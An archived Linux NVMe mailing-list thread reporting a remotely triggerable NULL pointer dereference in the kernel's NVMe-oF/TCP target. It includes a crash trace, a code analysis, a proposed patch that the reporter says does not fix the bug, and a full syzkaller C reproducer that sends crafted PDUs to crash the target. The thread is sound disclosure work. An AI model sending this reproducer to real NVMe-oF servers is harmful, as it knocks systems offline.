linux-nvme.lists.infradead.org archive mirror
 help / color / mirror / Atom feed
* [Bug Report] NVMe-oF/TCP - NULL Pointer Dereference in `nvmet_tcp_execute_request`
@ 2023-11-06 13:39 Alon Zahavi
  2023-11-15  9:40 ` Alon Zahavi
                   ` (2 more replies)
  0 siblings, 3 replies; 6+ messages in thread
From: Alon Zahavi @ 2023-11-06 13:39 UTC (permalink / raw)
  To: linux-nvme; +Cc: Sagi Grimberg, Christoph Hellwig, Chaitanya Kulkarni

# Bug Overview

## The Bug
There is a null-ptr-deref in `nvmet_tcp_execute_request`.

## Bug Location
`drivers/nvme/target/tcp.c` in the function `nvmet_tcp_execute_request`.

## Bug Class
Remote Denial of Service

## Disclaimer:
This bug was found using Syzkaller with NVMe-oF/TCP added support.

# Technical Details

## Kernel Report - NULL Pointer Dereference
```
BUG: kernel NULL pointer dereference, address: 0000000000000000
#PF: supervisor instruction fetch in kernel mode
#PF: error_code(0x0010) - not-present page
PGD 800000003c2bc067 P4D 800000003c2bc067 PUD 3dfc5067 PMD 0
Oops: 0010 [#1] PREEMPT SMP KASAN PTI
CPU: 0 PID: 2363 Comm: kworker/0:1H Not tainted 6.5.0-rc1+ #4
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014
Workqueue: nvmet_tcp_wq nvmet_tcp_io_work
RIP: 0010:0x0
Code: Unable to access opcode bytes at 0xffffffffffffffd6.
RSP: 0018:ffff888013b0fba8 EFLAGS: 00010246
RAX: 0000000000000000 RBX: 0000000000000000 RCX: 0000000000000000
RDX: ffff888013d50000 RSI: ffffffff833ddfe5 RDI: ffff88800e5a33e8
RBP: ffff888013b0fcf0 R08: 0000000000000001 R09: 0000000000000000
R10: 0000000000000000 R11: 0000000000000001 R12: ffff88800e5a33e8
R13: 0000000000000000 R14: ffff88800e5a33e0 R15: dffffc0000000000
FS:  0000000000000000(0000) GS:ffff88806cc00000(0000) knlGS:0000000000000000
CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: ffffffffffffffd6 CR3: 0000000016faa003 CR4: 0000000000370ef0
Call Trace:
 <TASK>
 nvmet_tcp_execute_request drivers/nvme/target/tcp.c:578 [inline]
 nvmet_tcp_try_recv_data drivers/nvme/target/tcp.c:1232 [inline]
 nvmet_tcp_try_recv_one drivers/nvme/target/tcp.c:1312 [inline]
 nvmet_tcp_try_recv drivers/nvme/target/tcp.c:1338 [inline]
 nvmet_tcp_io_work+0x202a/0x2990 drivers/nvme/target/tcp.c:1388
 process_one_work+0xb54/0x18b0 kernel/workqueue.c:2597
 worker_thread+0x663/0x1300 kernel/workqueue.c:2748
 kthread+0x357/0x460 kernel/kthread.c:389
 ret_from_fork+0x29/0x50 arch/x86/entry/entry_64.S:308
 </TASK>
Modules linked in:
CR2: 0000000000000000
---[ end trace 0000000000000000 ]---
```

## Description

### Tracing The Bug
In the call for `nvmet_tcp_execute_request` (see code block 1), there
is a call to `cmd->req.execute()`.
When executing the reproducer, the function pointer is pointing to
NULL, thus the BUG: Unable to handle NULL pointer dereference.

Code Block 1:
```
static void nvmet_tcp_execute_request(struct nvmet_tcp_cmd *cmd)
{
    if (unlikely(cmd->flags & NVMET_TCP_F_INIT_FAILED))
        nvmet_tcp_queue_response(&cmd->req);
    else
        cmd->req.execute(&cmd->req);
}
```

The reason why `cmd->req.execute` is NULL when we get into the
`nvmet_tcp_execute_request` function lies in the `nvmet_req_init`
function (drivers/nvme/target/core.c).

Code Block 2:
```
bool nvmet_req_init(struct nvmet_req *req, struct nvmet_cq *cq,
                                 struct nvmet_sq *sq, const struct
nvmet_fabrics_ops *ops)
{
    ...

    if (unlikely(!req->sq->ctrl))
        /* will return an error for any non-connect command: */
        status = nvmet_parse_connect_cmd(req);
    else if (likely(req->sq->qid != 0))
        status = nvmet_parse_io_cmd(req);
    else
        status = nvmet_parse_admin_cmd(req);

  ...
}
```

In the `nvmet_parse_admin_cmd` and `nvmet_parse_connect_cmd`
functions, there are some assignments for `req->execute`.
For example, here is in code block 3, the assignment in
`nvmet_parse_connect_command` (drivers/nvme/target/fabrics-cmd.c).

Code Block 3:
```
u16 nvmet_parse_connect_cmd(struct nvmet_req *req)
{
    struct nvme_command *cmd = req->cmd;

    ...

    if (cmd->connect.qid == 0)
        req->execute = nvmet_execute_admin_connect;
    else
        req->execute = nvmet_execute_io_connect;
     return 0;
}
```

## Root Cause
When executing the reproducer the `nvmet_parse_connect_cmd` is not
being called, but execution is continuing to
`nvmet_tcp_execute_request` .

## Reproducer
I am adding a reproducer generated by Syzkaller with some
optimizations and minor changes.

```
// autogenerated by syzkaller (https://github.com/google/syzkaller)

#define _GNU_SOURCE

#include <endian.h>
#include <errno.h>
#include <fcntl.h>
#include <sched.h>
#include <stdarg.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mount.h>
#include <sys/prctl.h>
#include <sys/resource.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

#include <linux/capability.h>

uint64_t r[1] = {0xffffffffffffffff};

void loop(void)
{
  intptr_t res = 0;
  res = syscall(__NR_socket, /*domain=*/2ul, /*type=*/1ul, /*proto=*/0);
  if (res != -1)
    r[0] = res;
  *(uint16_t*)0x20000100 = 2;
  *(uint16_t*)0x20000102 = htobe16(0x1144);
  *(uint32_t*)0x20000104 = htobe32(0x7f000001);
  syscall(__NR_connect, /*fd=*/r[0], /*addr=*/0x20000100ul, /*addrlen=*/0x10ul);
  *(uint8_t*)0x200001c0 = 0;
  *(uint8_t*)0x200001c1 = 0;
  *(uint8_t*)0x200001c2 = 0x80;
  *(uint8_t*)0x200001c3 = 0;
  *(uint32_t*)0x200001c4 = 0x80;
  *(uint16_t*)0x200001c8 = 0;
  *(uint8_t*)0x200001ca = 0;
  *(uint8_t*)0x200001cb = 0;
  *(uint32_t*)0x200001cc = 0;
  memcpy((void*)0x200001d0,
         "\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf"
         "\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf"
         "\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35"
         "\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86"
         "\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf"
         "\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf"
         "\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86",
         112);
  syscall(__NR_sendto, /*fd=*/r[0], /*pdu=*/0x200001c0ul, /*len=*/0x80ul,
          /*f=*/0ul, /*addr=*/0ul, /*addrlen=*/0ul);
  *(uint8_t*)0x200001c0 = 6;
  *(uint8_t*)0x200001c1 = 3;
  *(uint8_t*)0x200001c2 = 0x18;
  *(uint8_t*)0x200001c3 = 0x18;
  *(uint32_t*)0x200001c4 = 9;
  *(uint16_t*)0x200001c8 = 0;
  *(uint16_t*)0x200001ca = 0;
  *(uint32_t*)0x200001cc = 0;
  *(uint32_t*)0x200001d0 = 0;
  memset((void*)0x200001d4, 0, 4);
  *(uint64_t*)0x20000240 = 0;
  syscall(__NR_sendto, /*fd=*/r[0], /*pdu=*/0x200001c0ul, /*len=*/0x88ul,
          /*f=*/0ul, /*addr=*/0ul, /*addrlen=*/0ul);
}
int main(void)
{
  syscall(__NR_mmap, /*addr=*/0x1ffff000ul, /*len=*/0x1000ul, /*prot=*/0ul,
          /*flags=*/0x32ul, /*fd=*/-1, /*offset=*/0ul);
  syscall(__NR_mmap, /*addr=*/0x20000000ul, /*len=*/0x1000000ul, /*prot=*/7ul,
          /*flags=*/0x32ul, /*fd=*/-1, /*offset=*/0ul);
  syscall(__NR_mmap, /*addr=*/0x21000000ul, /*len=*/0x1000ul, /*prot=*/0ul,
          /*flags=*/0x32ul, /*fd=*/-1, /*offset=*/0ul);
  loop();
  return 0;
}
```


^ permalink raw reply	[flat|nested] 6+ messages in thread

* Re: [Bug Report] NVMe-oF/TCP - NULL Pointer Dereference in `nvmet_tcp_execute_request`
  2023-11-06 13:39 [Bug Report] NVMe-oF/TCP - NULL Pointer Dereference in `nvmet_tcp_execute_request` Alon Zahavi
@ 2023-11-15  9:40 ` Alon Zahavi
  2023-11-16  3:28 ` Guoqing Jiang
  2023-11-20 10:36 ` Sagi Grimberg
  2 siblings, 0 replies; 6+ messages in thread
From: Alon Zahavi @ 2023-11-15  9:40 UTC (permalink / raw)
  To: linux-nvme; +Cc: Sagi Grimberg, Christoph Hellwig, Chaitanya Kulkarni

Just sending another reminder for this issue.
Until a fix for this there is a remote DoS that can be triggered.

On Mon, 6 Nov 2023 at 15:39, Alon Zahavi <zahavi.alon@gmail.com> wrote:
>
> # Bug Overview
>
> ## The Bug
> There is a null-ptr-deref in `nvmet_tcp_execute_request`.
>
> ## Bug Location
> `drivers/nvme/target/tcp.c` in the function `nvmet_tcp_execute_request`.
>
> ## Bug Class
> Remote Denial of Service
>
> ## Disclaimer:
> This bug was found using Syzkaller with NVMe-oF/TCP added support.
>
> # Technical Details
>
> ## Kernel Report - NULL Pointer Dereference
> ```
> BUG: kernel NULL pointer dereference, address: 0000000000000000
> #PF: supervisor instruction fetch in kernel mode
> #PF: error_code(0x0010) - not-present page
> PGD 800000003c2bc067 P4D 800000003c2bc067 PUD 3dfc5067 PMD 0
> Oops: 0010 [#1] PREEMPT SMP KASAN PTI
> CPU: 0 PID: 2363 Comm: kworker/0:1H Not tainted 6.5.0-rc1+ #4
> Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014
> Workqueue: nvmet_tcp_wq nvmet_tcp_io_work
> RIP: 0010:0x0
> Code: Unable to access opcode bytes at 0xffffffffffffffd6.
> RSP: 0018:ffff888013b0fba8 EFLAGS: 00010246
> RAX: 0000000000000000 RBX: 0000000000000000 RCX: 0000000000000000
> RDX: ffff888013d50000 RSI: ffffffff833ddfe5 RDI: ffff88800e5a33e8
> RBP: ffff888013b0fcf0 R08: 0000000000000001 R09: 0000000000000000
> R10: 0000000000000000 R11: 0000000000000001 R12: ffff88800e5a33e8
> R13: 0000000000000000 R14: ffff88800e5a33e0 R15: dffffc0000000000
> FS:  0000000000000000(0000) GS:ffff88806cc00000(0000) knlGS:0000000000000000
> CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
> CR2: ffffffffffffffd6 CR3: 0000000016faa003 CR4: 0000000000370ef0
> Call Trace:
>  <TASK>
>  nvmet_tcp_execute_request drivers/nvme/target/tcp.c:578 [inline]
>  nvmet_tcp_try_recv_data drivers/nvme/target/tcp.c:1232 [inline]
>  nvmet_tcp_try_recv_one drivers/nvme/target/tcp.c:1312 [inline]
>  nvmet_tcp_try_recv drivers/nvme/target/tcp.c:1338 [inline]
>  nvmet_tcp_io_work+0x202a/0x2990 drivers/nvme/target/tcp.c:1388
>  process_one_work+0xb54/0x18b0 kernel/workqueue.c:2597
>  worker_thread+0x663/0x1300 kernel/workqueue.c:2748
>  kthread+0x357/0x460 kernel/kthread.c:389
>  ret_from_fork+0x29/0x50 arch/x86/entry/entry_64.S:308
>  </TASK>
> Modules linked in:
> CR2: 0000000000000000
> ---[ end trace 0000000000000000 ]---
> ```
>
> ## Description
>
> ### Tracing The Bug
> In the call for `nvmet_tcp_execute_request` (see code block 1), there
> is a call to `cmd->req.execute()`.
> When executing the reproducer, the function pointer is pointing to
> NULL, thus the BUG: Unable to handle NULL pointer dereference.
>
> Code Block 1:
> ```
> static void nvmet_tcp_execute_request(struct nvmet_tcp_cmd *cmd)
> {
>     if (unlikely(cmd->flags & NVMET_TCP_F_INIT_FAILED))
>         nvmet_tcp_queue_response(&cmd->req);
>     else
>         cmd->req.execute(&cmd->req);
> }
> ```
>
> The reason why `cmd->req.execute` is NULL when we get into the
> `nvmet_tcp_execute_request` function lies in the `nvmet_req_init`
> function (drivers/nvme/target/core.c).
>
> Code Block 2:
> ```
> bool nvmet_req_init(struct nvmet_req *req, struct nvmet_cq *cq,
>                                  struct nvmet_sq *sq, const struct
> nvmet_fabrics_ops *ops)
> {
>     ...
>
>     if (unlikely(!req->sq->ctrl))
>         /* will return an error for any non-connect command: */
>         status = nvmet_parse_connect_cmd(req);
>     else if (likely(req->sq->qid != 0))
>         status = nvmet_parse_io_cmd(req);
>     else
>         status = nvmet_parse_admin_cmd(req);
>
>   ...
> }
> ```
>
> In the `nvmet_parse_admin_cmd` and `nvmet_parse_connect_cmd`
> functions, there are some assignments for `req->execute`.
> For example, here is in code block 3, the assignment in
> `nvmet_parse_connect_command` (drivers/nvme/target/fabrics-cmd.c).
>
> Code Block 3:
> ```
> u16 nvmet_parse_connect_cmd(struct nvmet_req *req)
> {
>     struct nvme_command *cmd = req->cmd;
>
>     ...
>
>     if (cmd->connect.qid == 0)
>         req->execute = nvmet_execute_admin_connect;
>     else
>         req->execute = nvmet_execute_io_connect;
>      return 0;
> }
> ```
>
> ## Root Cause
> When executing the reproducer the `nvmet_parse_connect_cmd` is not
> being called, but execution is continuing to
> `nvmet_tcp_execute_request` .
>
> ## Reproducer
> I am adding a reproducer generated by Syzkaller with some
> optimizations and minor changes.
>
> ```
> // autogenerated by syzkaller (https://github.com/google/syzkaller)
>
> #define _GNU_SOURCE
>
> #include <endian.h>
> #include <errno.h>
> #include <fcntl.h>
> #include <sched.h>
> #include <stdarg.h>
> #include <stdbool.h>
> #include <stdint.h>
> #include <stdio.h>
> #include <stdlib.h>
> #include <string.h>
> #include <sys/mount.h>
> #include <sys/prctl.h>
> #include <sys/resource.h>
> #include <sys/stat.h>
> #include <sys/syscall.h>
> #include <sys/time.h>
> #include <sys/types.h>
> #include <sys/wait.h>
> #include <unistd.h>
>
> #include <linux/capability.h>
>
> uint64_t r[1] = {0xffffffffffffffff};
>
> void loop(void)
> {
>   intptr_t res = 0;
>   res = syscall(__NR_socket, /*domain=*/2ul, /*type=*/1ul, /*proto=*/0);
>   if (res != -1)
>     r[0] = res;
>   *(uint16_t*)0x20000100 = 2;
>   *(uint16_t*)0x20000102 = htobe16(0x1144);
>   *(uint32_t*)0x20000104 = htobe32(0x7f000001);
>   syscall(__NR_connect, /*fd=*/r[0], /*addr=*/0x20000100ul, /*addrlen=*/0x10ul);
>   *(uint8_t*)0x200001c0 = 0;
>   *(uint8_t*)0x200001c1 = 0;
>   *(uint8_t*)0x200001c2 = 0x80;
>   *(uint8_t*)0x200001c3 = 0;
>   *(uint32_t*)0x200001c4 = 0x80;
>   *(uint16_t*)0x200001c8 = 0;
>   *(uint8_t*)0x200001ca = 0;
>   *(uint8_t*)0x200001cb = 0;
>   *(uint32_t*)0x200001cc = 0;
>   memcpy((void*)0x200001d0,
>          "\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf"
>          "\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf"
>          "\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35"
>          "\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86"
>          "\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf"
>          "\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf"
>          "\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86",
>          112);
>   syscall(__NR_sendto, /*fd=*/r[0], /*pdu=*/0x200001c0ul, /*len=*/0x80ul,
>           /*f=*/0ul, /*addr=*/0ul, /*addrlen=*/0ul);
>   *(uint8_t*)0x200001c0 = 6;
>   *(uint8_t*)0x200001c1 = 3;
>   *(uint8_t*)0x200001c2 = 0x18;
>   *(uint8_t*)0x200001c3 = 0x18;
>   *(uint32_t*)0x200001c4 = 9;
>   *(uint16_t*)0x200001c8 = 0;
>   *(uint16_t*)0x200001ca = 0;
>   *(uint32_t*)0x200001cc = 0;
>   *(uint32_t*)0x200001d0 = 0;
>   memset((void*)0x200001d4, 0, 4);
>   *(uint64_t*)0x20000240 = 0;
>   syscall(__NR_sendto, /*fd=*/r[0], /*pdu=*/0x200001c0ul, /*len=*/0x88ul,
>           /*f=*/0ul, /*addr=*/0ul, /*addrlen=*/0ul);
> }
> int main(void)
> {
>   syscall(__NR_mmap, /*addr=*/0x1ffff000ul, /*len=*/0x1000ul, /*prot=*/0ul,
>           /*flags=*/0x32ul, /*fd=*/-1, /*offset=*/0ul);
>   syscall(__NR_mmap, /*addr=*/0x20000000ul, /*len=*/0x1000000ul, /*prot=*/7ul,
>           /*flags=*/0x32ul, /*fd=*/-1, /*offset=*/0ul);
>   syscall(__NR_mmap, /*addr=*/0x21000000ul, /*len=*/0x1000ul, /*prot=*/0ul,
>           /*flags=*/0x32ul, /*fd=*/-1, /*offset=*/0ul);
>   loop();
>   return 0;
> }
> ```


^ permalink raw reply	[flat|nested] 6+ messages in thread

* Re: [Bug Report] NVMe-oF/TCP - NULL Pointer Dereference in `nvmet_tcp_execute_request`
  2023-11-06 13:39 [Bug Report] NVMe-oF/TCP - NULL Pointer Dereference in `nvmet_tcp_execute_request` Alon Zahavi
  2023-11-15  9:40 ` Alon Zahavi
@ 2023-11-16  3:28 ` Guoqing Jiang
  2023-11-19 22:18   ` Alon Zahavi
  2023-11-20 10:36 ` Sagi Grimberg
  2 siblings, 1 reply; 6+ messages in thread
From: Guoqing Jiang @ 2023-11-16  3:28 UTC (permalink / raw)
  To: Alon Zahavi, linux-nvme
  Cc: Sagi Grimberg, Christoph Hellwig, Chaitanya Kulkarni

Hi,

On 11/6/23 21:39, Alon Zahavi wrote:
> # Bug Overview
>
> ## The Bug
> There is a null-ptr-deref in `nvmet_tcp_execute_request`.
>
> ## Bug Location
> `drivers/nvme/target/tcp.c` in the function `nvmet_tcp_execute_request`.
>
> ## Bug Class
> Remote Denial of Service
>
> ## Disclaimer:
> This bug was found using Syzkaller with NVMe-oF/TCP added support.
>
> # Technical Details
>
> ## Kernel Report - NULL Pointer Dereference
> ```
> BUG: kernel NULL pointer dereference, address: 0000000000000000
> #PF: supervisor instruction fetch in kernel mode
> #PF: error_code(0x0010) - not-present page
> PGD 800000003c2bc067 P4D 800000003c2bc067 PUD 3dfc5067 PMD 0
> Oops: 0010 [#1] PREEMPT SMP KASAN PTI
> CPU: 0 PID: 2363 Comm: kworker/0:1H Not tainted 6.5.0-rc1+ #4
> Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014
> Workqueue: nvmet_tcp_wq nvmet_tcp_io_work
> RIP: 0010:0x0
> Code: Unable to access opcode bytes at 0xffffffffffffffd6.
> RSP: 0018:ffff888013b0fba8 EFLAGS: 00010246
> RAX: 0000000000000000 RBX: 0000000000000000 RCX: 0000000000000000
> RDX: ffff888013d50000 RSI: ffffffff833ddfe5 RDI: ffff88800e5a33e8
> RBP: ffff888013b0fcf0 R08: 0000000000000001 R09: 0000000000000000
> R10: 0000000000000000 R11: 0000000000000001 R12: ffff88800e5a33e8
> R13: 0000000000000000 R14: ffff88800e5a33e0 R15: dffffc0000000000
> FS:  0000000000000000(0000) GS:ffff88806cc00000(0000) knlGS:0000000000000000
> CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
> CR2: ffffffffffffffd6 CR3: 0000000016faa003 CR4: 0000000000370ef0
> Call Trace:
>   <TASK>
>   nvmet_tcp_execute_request drivers/nvme/target/tcp.c:578 [inline]
>   nvmet_tcp_try_recv_data drivers/nvme/target/tcp.c:1232 [inline]
>   nvmet_tcp_try_recv_one drivers/nvme/target/tcp.c:1312 [inline]
>   nvmet_tcp_try_recv drivers/nvme/target/tcp.c:1338 [inline]
>   nvmet_tcp_io_work+0x202a/0x2990 drivers/nvme/target/tcp.c:1388
>   process_one_work+0xb54/0x18b0 kernel/workqueue.c:2597
>   worker_thread+0x663/0x1300 kernel/workqueue.c:2748
>   kthread+0x357/0x460 kernel/kthread.c:389
>   ret_from_fork+0x29/0x50 arch/x86/entry/entry_64.S:308
>   </TASK>
> Modules linked in:
> CR2: 0000000000000000
> ---[ end trace 0000000000000000 ]---
> ```
>
> ## Description
>
> ### Tracing The Bug
> In the call for `nvmet_tcp_execute_request` (see code block 1), there
> is a call to `cmd->req.execute()`.
> When executing the reproducer, the function pointer is pointing to
> NULL, thus the BUG: Unable to handle NULL pointer dereference.
>
> Code Block 1:
> ```
> static void nvmet_tcp_execute_request(struct nvmet_tcp_cmd *cmd)
> {
>      if (unlikely(cmd->flags & NVMET_TCP_F_INIT_FAILED))
>          nvmet_tcp_queue_response(&cmd->req);
>      else
>          cmd->req.execute(&cmd->req);
> }
> ```
>
> The reason why `cmd->req.execute` is NULL when we get into the
> `nvmet_tcp_execute_request` function lies in the `nvmet_req_init`
> function (drivers/nvme/target/core.c).
>
> Code Block 2:
> ```
> bool nvmet_req_init(struct nvmet_req *req, struct nvmet_cq *cq,
>                                   struct nvmet_sq *sq, const struct
> nvmet_fabrics_ops *ops)
> {
>      ...
>
>      if (unlikely(!req->sq->ctrl))
>          /* will return an error for any non-connect command: */
>          status = nvmet_parse_connect_cmd(req);
>      else if (likely(req->sq->qid != 0))
>          status = nvmet_parse_io_cmd(req);
>      else
>          status = nvmet_parse_admin_cmd(req);
>
>    ...
> }
> ```
>
> In the `nvmet_parse_admin_cmd` and `nvmet_parse_connect_cmd`
> functions, there are some assignments for `req->execute`.
> For example, here is in code block 3, the assignment in
> `nvmet_parse_connect_command` (drivers/nvme/target/fabrics-cmd.c).
>
> Code Block 3:
> ```
> u16 nvmet_parse_connect_cmd(struct nvmet_req *req)
> {
>      struct nvme_command *cmd = req->cmd;
>
>      ...
>
>      if (cmd->connect.qid == 0)
>          req->execute = nvmet_execute_admin_connect;
>      else
>          req->execute = nvmet_execute_io_connect;
>       return 0;
> }
> ```
>
> ## Root Cause
> When executing the reproducer the `nvmet_parse_connect_cmd` is not
> being called, but execution is continuing to
> `nvmet_tcp_execute_request` .
>
> ## Reproducer
> I am adding a reproducer generated by Syzkaller with some
> optimizations and minor changes.

Could you try the change to see if it helps?

--- a/drivers/nvme/target/tcp.c
+++ b/drivers/nvme/target/tcp.c
@@ -1062,7 +1062,7 @@ static int nvmet_tcp_done_recv_pdu(struct 
nvmet_tcp_queue *queue)
le32_to_cpu(req->cmd->common.dptr.sgl.length));

                 nvmet_tcp_handle_req_failure(queue, queue->cmd, req);
-               return 0;
+               return -EAGAIN;
         }

Thanks,
Guoqing


^ permalink raw reply	[flat|nested] 6+ messages in thread

* Re: [Bug Report] NVMe-oF/TCP - NULL Pointer Dereference in `nvmet_tcp_execute_request`
  2023-11-16  3:28 ` Guoqing Jiang
@ 2023-11-19 22:18   ` Alon Zahavi
  2023-11-20  6:03     ` Guoqing Jiang
  0 siblings, 1 reply; 6+ messages in thread
From: Alon Zahavi @ 2023-11-19 22:18 UTC (permalink / raw)
  To: Guoqing Jiang
  Cc: linux-nvme, Sagi Grimberg, Christoph Hellwig, Chaitanya Kulkarni

On Thu, 16 Nov 2023 at 05:28, Guoqing Jiang <guoqing.jiang@linux.dev> wrote:
>
> Hi,
>
> On 11/6/23 21:39, Alon Zahavi wrote:
> > # Bug Overview
> >
> > ## The Bug
> > There is a null-ptr-deref in `nvmet_tcp_execute_request`.
> >
> > ## Bug Location
> > `drivers/nvme/target/tcp.c` in the function `nvmet_tcp_execute_request`.
> >
> > ## Bug Class
> > Remote Denial of Service
> >
> > ## Disclaimer:
> > This bug was found using Syzkaller with NVMe-oF/TCP added support.
> >
> > # Technical Details
> >
> > ## Kernel Report - NULL Pointer Dereference
> > ```
> > BUG: kernel NULL pointer dereference, address: 0000000000000000
> > #PF: supervisor instruction fetch in kernel mode
> > #PF: error_code(0x0010) - not-present page
> > PGD 800000003c2bc067 P4D 800000003c2bc067 PUD 3dfc5067 PMD 0
> > Oops: 0010 [#1] PREEMPT SMP KASAN PTI
> > CPU: 0 PID: 2363 Comm: kworker/0:1H Not tainted 6.5.0-rc1+ #4
> > Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014
> > Workqueue: nvmet_tcp_wq nvmet_tcp_io_work
> > RIP: 0010:0x0
> > Code: Unable to access opcode bytes at 0xffffffffffffffd6.
> > RSP: 0018:ffff888013b0fba8 EFLAGS: 00010246
> > RAX: 0000000000000000 RBX: 0000000000000000 RCX: 0000000000000000
> > RDX: ffff888013d50000 RSI: ffffffff833ddfe5 RDI: ffff88800e5a33e8
> > RBP: ffff888013b0fcf0 R08: 0000000000000001 R09: 0000000000000000
> > R10: 0000000000000000 R11: 0000000000000001 R12: ffff88800e5a33e8
> > R13: 0000000000000000 R14: ffff88800e5a33e0 R15: dffffc0000000000
> > FS:  0000000000000000(0000) GS:ffff88806cc00000(0000) knlGS:0000000000000000
> > CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
> > CR2: ffffffffffffffd6 CR3: 0000000016faa003 CR4: 0000000000370ef0
> > Call Trace:
> >   <TASK>
> >   nvmet_tcp_execute_request drivers/nvme/target/tcp.c:578 [inline]
> >   nvmet_tcp_try_recv_data drivers/nvme/target/tcp.c:1232 [inline]
> >   nvmet_tcp_try_recv_one drivers/nvme/target/tcp.c:1312 [inline]
> >   nvmet_tcp_try_recv drivers/nvme/target/tcp.c:1338 [inline]
> >   nvmet_tcp_io_work+0x202a/0x2990 drivers/nvme/target/tcp.c:1388
> >   process_one_work+0xb54/0x18b0 kernel/workqueue.c:2597
> >   worker_thread+0x663/0x1300 kernel/workqueue.c:2748
> >   kthread+0x357/0x460 kernel/kthread.c:389
> >   ret_from_fork+0x29/0x50 arch/x86/entry/entry_64.S:308
> >   </TASK>
> > Modules linked in:
> > CR2: 0000000000000000
> > ---[ end trace 0000000000000000 ]---
> > ```
> >
> > ## Description
> >
> > ### Tracing The Bug
> > In the call for `nvmet_tcp_execute_request` (see code block 1), there
> > is a call to `cmd->req.execute()`.
> > When executing the reproducer, the function pointer is pointing to
> > NULL, thus the BUG: Unable to handle NULL pointer dereference.
> >
> > Code Block 1:
> > ```
> > static void nvmet_tcp_execute_request(struct nvmet_tcp_cmd *cmd)
> > {
> >      if (unlikely(cmd->flags & NVMET_TCP_F_INIT_FAILED))
> >          nvmet_tcp_queue_response(&cmd->req);
> >      else
> >          cmd->req.execute(&cmd->req);
> > }
> > ```
> >
> > The reason why `cmd->req.execute` is NULL when we get into the
> > `nvmet_tcp_execute_request` function lies in the `nvmet_req_init`
> > function (drivers/nvme/target/core.c).
> >
> > Code Block 2:
> > ```
> > bool nvmet_req_init(struct nvmet_req *req, struct nvmet_cq *cq,
> >                                   struct nvmet_sq *sq, const struct
> > nvmet_fabrics_ops *ops)
> > {
> >      ...
> >
> >      if (unlikely(!req->sq->ctrl))
> >          /* will return an error for any non-connect command: */
> >          status = nvmet_parse_connect_cmd(req);
> >      else if (likely(req->sq->qid != 0))
> >          status = nvmet_parse_io_cmd(req);
> >      else
> >          status = nvmet_parse_admin_cmd(req);
> >
> >    ...
> > }
> > ```
> >
> > In the `nvmet_parse_admin_cmd` and `nvmet_parse_connect_cmd`
> > functions, there are some assignments for `req->execute`.
> > For example, here is in code block 3, the assignment in
> > `nvmet_parse_connect_command` (drivers/nvme/target/fabrics-cmd.c).
> >
> > Code Block 3:
> > ```
> > u16 nvmet_parse_connect_cmd(struct nvmet_req *req)
> > {
> >      struct nvme_command *cmd = req->cmd;
> >
> >      ...
> >
> >      if (cmd->connect.qid == 0)
> >          req->execute = nvmet_execute_admin_connect;
> >      else
> >          req->execute = nvmet_execute_io_connect;
> >       return 0;
> > }
> > ```
> >
> > ## Root Cause
> > When executing the reproducer the `nvmet_parse_connect_cmd` is not
> > being called, but execution is continuing to
> > `nvmet_tcp_execute_request` .
> >
> > ## Reproducer
> > I am adding a reproducer generated by Syzkaller with some
> > optimizations and minor changes.
>
> Could you try the change to see if it helps?
>
> --- a/drivers/nvme/target/tcp.c
> +++ b/drivers/nvme/target/tcp.c
> @@ -1062,7 +1062,7 @@ static int nvmet_tcp_done_recv_pdu(struct
> nvmet_tcp_queue *queue)
> le32_to_cpu(req->cmd->common.dptr.sgl.length));
>
>                  nvmet_tcp_handle_req_failure(queue, queue->cmd, req);
> -               return 0;
> +               return -EAGAIN;
>          }
>
> Thanks,
> Guoqing

Checked it.
Although it seems useful to return some error here anyways, it doesn't
help with the bug.
The flow leading to the NULL deref doesn't reach this code at all,
which is probably
part of why it happens.
The call trace looks like this:
```
 nvmet_tcp_execute_request drivers/nvme/target/tcp.c:578 [inline]
 nvmet_tcp_try_recv_data drivers/nvme/target/tcp.c:1232 [inline]
 nvmet_tcp_try_recv_one drivers/nvme/target/tcp.c:1312 [inline]
 nvmet_tcp_try_recv drivers/nvme/target/tcp.c:1338 [inline]
 nvmet_tcp_io_work+0x202a/0x2990 drivers/nvme/target/tcp.c:1388
```
so `nvmet_tcp_done_recv_pdu` is not called here.


^ permalink raw reply	[flat|nested] 6+ messages in thread

* Re: [Bug Report] NVMe-oF/TCP - NULL Pointer Dereference in `nvmet_tcp_execute_request`
  2023-11-19 22:18   ` Alon Zahavi
